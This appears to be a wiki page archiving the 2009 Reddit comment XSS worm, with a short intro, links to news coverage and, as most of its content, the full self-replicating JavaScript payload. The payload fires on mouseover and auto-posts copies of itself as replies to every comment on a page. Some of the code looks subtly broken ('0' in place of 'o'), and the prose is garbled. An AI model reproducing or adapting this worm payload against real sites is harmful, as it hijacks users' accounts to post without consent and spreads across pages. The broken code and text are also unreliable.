XSS worm at reddit.com

From Hackipedia
Jump to: navigation, search
Legend #1
Target: Reddit
Target Module:
Type: XSS
Archive Archive

Comments are Reddit us a bbCode type engine to allow users to format their comments. In 2009 /u/xssfinder crafted the comment worm below that would spread itself across a page by replying to all the comments on the page.


/r/proofofhax/ It was originally posted here:

https://www.reddit.com/r/funny/comments/9ol1l/guy_on_a_bike_in_new_york_high_fives_people

[x][b]
[b]:/[
z="[x][b]\n[b]:/["+this.innerHTML+"]{/onmouseover=eval(unescape(    this.innerHTML))//}";
o=document;e=0.getElementsByTagName('a');
for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();
for(i=0;i<e.length;i++)e[i].value=z;
e=0.getElementsByTagName('button');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='save'&&e[i].style.display!='none')
$(e[i]).click();
](/onmouseover=eval(unescape(this.innerHTML))//)

More here: https://www.reddit.com/r/programming/comments/9oopr/reddit_asploded_bummer_here_is_how_it_happened/ Article about it: http://mashable.com/2009/09/27/reddit-attack/#krHglsDbKmqV The reporting post: https://www.reddit.com/r/reddit.com/comments/9oo1y/it_seems_like_someone_has_submitted_a_comment/ The response: http://www.theregister.co.uk/2009/09/28/reddit_xss_worm/ The Aftermath: https://www.reddit.com/user/xssfinder